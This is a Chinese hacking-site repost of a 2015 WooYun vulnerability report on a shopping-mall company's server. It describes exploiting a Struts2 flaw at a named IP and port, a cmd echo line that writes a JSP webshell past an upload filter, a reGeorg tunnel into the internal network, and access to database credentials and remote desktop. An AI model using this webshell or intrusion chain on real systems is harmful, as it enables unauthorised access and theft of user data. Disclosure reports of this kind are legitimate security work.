记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

金鹰国际购物中心某服务器getshell导致可内网漫游

2015-10-09 09:05

1.从主站入手,拿基本信息

QQ截图20150824173718.jpg



QQ截图20150824174938.jpg



QQ截图20150824174911.jpg



2.通过对以上几个系统的访问,发现端口是9090的BI系统存在struts2漏洞

QQ截图20150824201439.jpg



登录处post到http://222.190.116.172:9090/biplatform/sysLoginVerif.action



QQ截图20150824193629.jpg



QQ截图20150824194420.jpg





3.本来到这里应该很简单,上传个木马直接getshell,但系统却对<>;等字符做了过滤,只要上传的文件里面包含<>;就会上传失败,shell也就无法写入



4.突破

经过无数次的尝试和对比,发现系统并没有任何类似安全狗的东西,而是网站本身对上传做了限制,经过测试发现该action无法上传<>等,但是在命令执行入却可以写入<>,如此就好办了,通过echo 写入文件,然后通过>重定向到其它目录

命令执行内容如下:

code 区域
cmd /c echo ^<%(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%^> >  D:\tomcat7\webapps\ROOT\small.jsp



QQ截图20150824195454.jpg



小马的地址就是http://222.190.116.172:9090/small.jsp

然后再通过小马成功上传大马,http://222.190.116.172:9090/cmd.jsp

QQ截图20150824195737.jpg





接着上传reGeorg的jsp客户端,通过本地proxy代理到对方内网

QQ截图20150824200112.jpg





通过代码了解到本地的oracle数据库,通过navicat连接成功

QQ截图20150824200538.jpg



目测400多用户

QQ截图20150824200846.jpg



又看了一下另一个表,发现这个系统的一个牛逼的东西,那就是这个系统的用户名和密码竟然保存在数据库里面

QQ截图20150824201130.jpg



如此那就直接远程桌面了

QQ截图20150824162703.jpg



接下来就可以畅游内网啦



漏洞证明:

修复方案:

我再努力发现点东西,有新的发现再提交

知识来源: www.wooyun.org/bugs/wooyun-2015-0136648

阅读:83774 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“金鹰国际购物中心某服务器getshell导致可内网漫游”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云